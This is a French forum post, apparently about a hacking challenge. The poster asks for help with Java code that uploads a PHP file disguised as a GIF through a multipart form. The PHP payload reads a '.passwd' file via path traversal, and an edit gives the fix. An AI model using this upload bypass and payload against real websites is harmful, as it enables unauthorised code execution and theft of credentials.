Je tente d'envoyer un fichier .php dans un formulaire avec un fake mime.
J'ai l'impression que mon code n'est pas bon... je trouve la procedure un peu lourde mais apparement la technique est tel qu'elle.
URL target = new URL(challenge);
String boundary = Long.toHexString(System.currentTimeMillis()); // Just generate some unique random value.
StringBuilder query = new StringBuilder();
HttpURLConnection uc = (HttpURLConnection) target.openConnection();
uc.setDoOutput(true);
uc.setRequestMethod("POST");
uc.setRequestProperty("Content-Type", "multipart/form-data; boundary=" + boundary);
try (OutputStreamWriter out = new OutputStreamWriter(uc.getOutputStream())) {
// Send normal param.
query.append("--" + boundary).append("\r\n");
query.append("Content-Disposition: form-data; name=\"userfile\"; filename=\"hack.php\"").append("\r\n");
query.append("Content-Type: image/gif").append("\r\n");
query.append("\r\n");
query.append("<?php echo file_get_contents('../../../.passwd'); ?>").append("\r\n");
query.append("\r\n");
query.append("--" + boundary + "--").append("\r\n");
//send
out.write(query.toString());
out.write("\r\n");
out.flush();
// end
}catch (Exception e) {
e.printStackTrace();
}
EDIT :
Erreur toute bête du mec qui utilise un code sans l'analyser.
Remplacer user file par le name du champ post dans le formulaire :
name=\"userfile\";
- Edité par -Crixus- 19 février 2021 à 19:16:41
"Etre vrai, peu le peuvent." Friedrich Nietzsche
HttpUrlConnection multipart/form-data
× Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
× Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
"Etre vrai, peu le peuvent."
Friedrich Nietzsche